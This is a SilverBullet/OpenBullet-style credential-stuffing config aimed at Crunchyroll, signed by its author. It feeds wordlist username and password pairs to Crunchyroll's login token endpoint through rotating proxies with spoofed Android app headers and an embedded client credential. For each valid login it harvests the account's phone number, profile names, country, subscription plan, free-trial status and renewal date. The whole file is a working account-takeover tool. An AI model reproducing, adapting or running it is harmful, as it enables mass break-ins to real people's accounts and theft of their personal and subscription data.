[SETTINGS]
{
  "Name": "Crunchyroll V1",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2024-07-27T12:05:28.9152646+05:30",
  "AdditionalInfo": "@SPARUX-666",
  "RequiredPlugins": [],
  "Author": "@Sillverbullet",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "Default",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Cnfig by @SPARUX-666",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#guid FUNCTION GenerateGUID -> VAR "guid" 

REQUEST POST "https://www.crunchyroll.com/auth/v1/token" 
  CONTENT "username=<USER>&password=<PASS>&grant_type=password&scope=offline_access&device_id=<guid>&device_name=SM-G988N&device_type=samsung%20SM-G965N" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "host: www.crunchyroll.com" 
  HEADER "authorization: Basic dW55MzIwZW80d3l6dmo3dHhyeXU6Q3d0ekplM29ac002MU4zUjhMWTJlRFNQRVI0Y09yREY=" 
  HEADER "x-datadog-sampling-priority: 0" 
  HEADER "etp-anonymous-id: e8125dc0-f54d-4fc4-bf3a-52cebf6ad1cb" 
  HEADER "content-type: application/x-www-form-urlencoded" 
  HEADER "content-length: 188" 
  HEADER "accept-encoding: gzip" 
  HEADER "user-agent: Crunchyroll/3.61.1 Android/9 okhttp/4.12.0" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "invalid_credentials" 
  KEYCHAIN Success OR 
    KEY "access_token\":\"" 

#access_token PARSE "<SOURCE>" LR "access_token\":\"" "\"," -> VAR "access_token" 

REQUEST GET "https://www.crunchyroll.com/accounts/v1/me" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "host: www.crunchyroll.com" 
  HEADER "Authorization: Bearer <access_token>" 
  HEADER "user-agent: Crunchyroll/3.61.1 Android/9 okhttp/4.12.0" 

#external_id PARSE "<SOURCE>" LR "external_id\":\"" "\",\"" -> VAR "external_id" 

#Phone_Number PARSE "<SOURCE>" LR "phone\":\"" "\",\"" CreateEmpty=FALSE -> CAP "Phone Number" 

REQUEST GET "https://www.crunchyroll.com/accounts/v1/me/multiprofile" 
  
  HEADER "host: www.crunchyroll.com" 
  HEADER "Authorization: Bearer <access_token>" 
  HEADER "user-agent: Crunchyroll/3.61.1 Android/9 okhttp/4.12.0" 

#Profile_Usernames PARSE "<SOURCE>" LR "profile_name\":\"" "\",\"" Recursive=TRUE CreateEmpty=FALSE -> CAP "Profile Usernames" 

REQUEST GET "https://www.crunchyroll.com/subs/v1/subscriptions/<external_id>/benefits" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "host: www.crunchyroll.com" 
  HEADER "Authorization: Bearer <access_token>" 
  HEADER "user-agent: Crunchyroll/3.61.1 Android/9 okhttp/4.12.0" 

#Country PARSE "<SOURCE>" LR "subscription_country\":\"" "\",\"" CreateEmpty=FALSE -> CAP "Country" 

#Plan1 PARSE "<SOURCE>" LR "benefit\":\"" "\",\"" -> VAR "Plan1" 

#Plan FUNCTION Translate 
  KEY "cr_premium" VALUE "CrunchyRoll Premium" 
  KEY "cr_fan_pack" VALUE "CrunchyRoll Fan Pack" 
  KEY "cr_fanpack" VALUE "CrunchyRoll Fan Pack" 
  "<Plan1>" -> CAP "Plan" 

#total PARSE "<SOURCE>" LR "total\":" ",\"" -> VAR "total" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "benefit\":\"no_ads" 
    KEY "benefit\":\"cr_premium" 
    KEY "<total>" GreaterOrEqual "1" 
  KEYCHAIN Custom "FREE" OR 
    KEY "<total>" LessThanOrEqual "0" 
    KEY "membershipPlanPage2\":" 

REQUEST GET "https://www.crunchyroll.com/subs/v1/subscriptions/<external_id>/products" 
  
  HEADER "host: www.crunchyroll.com" 
  HEADER "Authorization: Bearer <access_token>" 
  HEADER "user-agent: Crunchyroll/3.61.1 Android/9 okhttp/4.12.0" 

#Free_Trial PARSE "<SOURCE>" LR "active_free_trial\":" "}]}" CreateEmpty=FALSE -> CAP "Free Trial" 

REQUEST GET "https://www.crunchyroll.com/subs/v1/subscriptions/<external_id>" 
  
  HEADER "host: www.crunchyroll.com" 
  HEADER "Authorization: Bearer <access_token>" 
  HEADER "user-agent: Crunchyroll/3.61.1 Android/9 okhttp/4.12.0" 

#Renewal_Date PARSE "<SOURCE>" LR "next_renewal_date\":\"" "T" CreateEmpty=FALSE -> CAP "Renewal Date" 

#Plan_Cycle PARSE "<SOURCE>" LR "cycle_duration\":\"" "\",\"" CreateEmpty=FALSE -> CAP "Plan Cycle" 

#Is_Active PARSE "<SOURCE>" LR "is_active\":" ",\"" -> VAR "Is Active" 

#SPARUX-666 FUNCTION Constant "@SPARUX-666" -> CAP "Config By" 

